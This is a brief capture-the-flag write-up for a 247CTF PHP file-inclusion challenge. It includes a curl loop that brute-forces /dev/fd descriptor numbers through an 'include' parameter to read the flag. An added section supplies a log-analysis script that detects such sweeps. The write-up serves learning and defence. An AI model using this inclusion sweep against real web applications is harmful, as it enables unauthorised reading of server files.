We know that the flag is in /tmp/flag.txt, and that we have to send a GET parameter named include to the server to read a file.
PHP has a bug named "Cannot open file descriptor streams", so we brute-force the file descriptor number to find the flag:
https://17ab3b9759789fcb.247ctf.com/?include=/dev/fd/<i>
With 0 <= i <= 99, because the include value can be at most 10 characters long: /dev/fd/ takes 8 of them, which leaves two digits.
We use:
for i in $(seq 0 99); do echo; echo "Testing fd $i"; curl -s "https://17ab3b9759789fcb.247ctf.com/?include=/dev/fd/$i" | grep 247; done
The flag is printed when i = 10.
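
On the defending side, a sweep like this is easy to spot in the web server's access log. The following is an added example, not part of the original write-up: it assumes a combined-format access log, and the sample log lines, addresses and function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag clients that sweep /dev/fd/<n> through an "include" parameter.

# Constructed sample access log (combined-style); addresses are documentation ranges.
sample_log() {
cat <<'EOF'
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?include=/dev/fd/0 HTTP/1.1" 200 12
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /?include=/dev/fd/1 HTTP/1.1" 200 12
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /?include=%2Fdev%2Ffd%2F2 HTTP/1.1" 200 12
203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /?include=/dev/fd/2 HTTP/1.1" 200 12
198.51.100.4 - - [01/Jan/2024:10:00:04 +0000] "GET /?include=/dev/fd/1 HTTP/1.1" 200 12
198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /?include=index.php HTTP/1.1" 200 512
192.0.2.9 - - [01/Jan/2024:10:00:06 +0000] "GET /about HTTP/1.1" 200 900
EOF
}

# Print "<client> <distinct fd count>" for every client that requested at least
# $1 (default 3) distinct /dev/fd/<n> values via include=. Reads the log on stdin.
fd_probe_sources() {
  awk -v min="${1:-3}" '
    {
      req = tolower($7)                 # request target in combined log format
      gsub(/%2f/, "/", req)             # normalise URL-encoded slashes
      if (match(req, /[?&]include=\/dev\/fd\/[0-9]+/)) {
        hit = substr(req, RSTART, RLENGTH)
        sub(/.*\//, "", hit)            # keep only the descriptor number
        if (!(($1, hit) in seen)) {     # count each descriptor once per client
          seen[$1, hit] = 1
          n[$1]++
        }
      }
    }
    END { for (ip in n) if (n[ip] >= min) print ip, n[ip] }
  ' | sort
}

# Run against the constructed sample: only the client sweeping descriptors is listed.
sample_log | fd_probe_sources 3
```

The threshold separates a single stray request from a sweep; tune it to the traffic the application normally sees.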